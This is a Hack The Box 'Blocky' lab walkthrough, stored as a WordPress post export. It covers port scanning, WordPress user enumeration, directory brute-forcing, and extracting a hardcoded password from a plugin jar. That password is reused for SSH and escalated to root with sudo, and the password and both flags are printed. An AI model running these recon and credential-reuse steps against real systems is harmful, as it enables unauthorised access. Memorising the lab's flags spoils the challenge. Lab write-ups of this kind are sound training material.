{"id":3710,"date":"2020-08-04T23:44:59","date_gmt":"2020-08-04T14:44:59","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3710"},"modified":"2020-08-30T23:35:07","modified_gmt":"2020-08-30T14:35:07","slug":"hack-the-box-blocky-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3710","title":{"rendered":"Hack The Box &#8211; Blocky &#8211; Walkthrough"},"content":{"rendered":"<h3>Port scan shows that WordPress is running<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 blocky.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-04 12:59 UTC\r\nNmap scan report for blocky.htb (10.10.10.37)\r\nHost is up (0.042s latency).\r\nNot shown: 97 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n21\/tcp open  ftp     ProFTPD 1.3.5a\r\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)\r\n|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)\r\n|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-generator: WordPress 4.8\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: BlockyCraft &amp;#8211; Under Construction!\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\nTRACEROUTE (using port 80\/tcp)\r\nHOP RTT     ADDRESS\r\n1   0.07 ms 172.17.0.1\r\n2   2.45 ms 10.10.10.37\r\n\r\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 28.83 seconds\r\n<\/pre>\n<h3>WPScan reveals a user named notch<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# wpscan --url http:\/\/blocky.htb\/ --enumerate u\r\n_______________________________________________________________\r\n         __          _______   _____\r\n         \\ \\        \/ \/  __ \\ \/ ____|\r\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\r\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\r\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\r\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\r\n\r\n         WordPress Security Scanner by the WPScan Team\r\n                         Version 3.8.4\r\n       Sponsored by Automattic - https:\/\/automattic.com\/\r\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\r\n_______________________________________________________________\r\n\r\n&#x5B;+] URL: http:\/\/blocky.htb\/ &#x5B;10.10.10.37]\r\n&#x5B;+] Started: Tue Aug  4 13:32:18 2020\r\n\r\nInteresting Finding(s):\r\n\r\n&#x5B;+] Headers\r\n | Interesting Entry: Server: Apache\/2.4.18 (Ubuntu)\r\n | Found By: Headers (Passive Detection)\r\n | Confidence: 100%\r\n\r\n&#x5B;+] XML-RPC seems to be enabled: http:\/\/blocky.htb\/xmlrpc.php\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n | References:\r\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\r\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\r\n |  - 
https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\r\n\r\n&#x5B;+] http:\/\/blocky.htb\/readme.html\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n\r\n&#x5B;+] Upload directory has listing enabled: http:\/\/blocky.htb\/wp-content\/uploads\/\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 100%\r\n\r\n&#x5B;+] The external WP-Cron seems to be enabled: http:\/\/blocky.htb\/wp-cron.php\r\n | Found By: Direct Access (Aggressive Detection)\r\n | Confidence: 60%\r\n | References:\r\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\r\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\r\n\r\n&#x5B;+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).\r\n | Found By: Emoji Settings (Passive Detection)\r\n |  - http:\/\/blocky.htb\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=4.8'\r\n | Confirmed By: Meta Generator (Passive Detection)\r\n |  - http:\/\/blocky.htb\/, Match: 'WordPress 4.8'\r\n\r\n&#x5B;i] The main theme could not be detected.\r\n\r\n&#x5B;+] Enumerating Users (via Passive and Aggressive Methods)\r\n Brute Forcing Author IDs - Time: 00:00:01 &lt;==================================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:01\r\n\r\n&#x5B;i] User(s) Identified:\r\n\r\n&#x5B;+] notch\r\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\r\n | Confirmed By: Login Error Messages (Aggressive Detection)\r\n\r\n&#x5B;!] No WPVulnDB API Token given, as a result vulnerability data has not been output.\r\n&#x5B;!] 
You can get a free API token with 50 daily requests by registering at https:\/\/wpvulndb.com\/users\/sign_up\r\n\r\n&#x5B;+] Finished: Tue Aug  4 13:32:26 2020\r\n&#x5B;+] Requests Done: 24\r\n&#x5B;+] Cached Requests: 26\r\n&#x5B;+] Data Sent: 5.365 KB\r\n&#x5B;+] Data Received: 169.842 KB\r\n&#x5B;+] Memory used: 110.863 MB\r\n&#x5B;+] Elapsed time: 00:00:07\r\n<\/pre>\n<h3>A directory scan turns up a few files of interest<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# gobuster dir -u http:\/\/blocky.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n&#x5B;+] Url:            http:\/\/blocky.htb\r\n&#x5B;+] Threads:        10\r\n&#x5B;+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n&#x5B;+] Status codes:   200,204,301,302,307,401,403\r\n&#x5B;+] User Agent:     gobuster\/3.0.1\r\n&#x5B;+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/04 13:56:32 Starting gobuster\r\n===============================================================\r\n\/wiki (Status: 301)\r\n\/wp-content (Status: 301)\r\n\/plugins (Status: 301)\r\n\/wp-includes (Status: 301)\r\n\/javascript (Status: 301)\r\n\/wp-admin (Status: 301)\r\n\/phpmyadmin (Status: 301)\r\n<\/pre>\n<h3>The wiki indicates that plugins likely holds useful information<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021.png\"><img loading=\"lazy\" decoding=\"async\" 
src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021-300x67.png\" alt=\"\" width=\"300\" height=\"67\" class=\"alignnone size-medium wp-image-3711\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021-300x67.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021-1024x228.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021-768x171.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021-1536x342.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231021.png 1884w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204-300x165.png\" alt=\"\" width=\"300\" height=\"165\" class=\"alignnone size-medium wp-image-3712\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204-300x165.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204-1024x562.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204-768x421.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-04_231204.png 1398w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Decompiling the jar yields a password, so try SSH with it<\/h3>\n<p>Apparently a proper decompile would recover the value more cleanly.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# wget http:\/\/10.10.10.37\/plugins\/files\/BlockyCore.jar\r\n# unzip 
BlockyCore.jar\r\nArchive:  BlockyCore.jar\r\n  inflating: META-INF\/MANIFEST.MF\r\n  inflating: com\/myfirstplugin\/BlockyCore.class\r\n# lv com\/myfirstplugin\/BlockyCore.class\r\n... 8YsqfCTnvxAUeduzjNSXe22 ...\r\n\r\n# ssh notch@blocky.htb\r\nnotch@blocky.htb's password:\r\n\r\n$ cat user.txt\r\n59fee0977fb60b8a0bc6e41e751f3cd5\r\n$ sudo su\r\n# cat \/root\/root.txt\r\n0a9694a5b4d272c694679f7860f1cd5f\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Port scan shows that WordPress is running # nmap -A -n -F -T5 blocky.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3710"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710\/revisions"}],"predecessor-version":[{"id":3791,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3710\/revisions\/3791"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat
.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}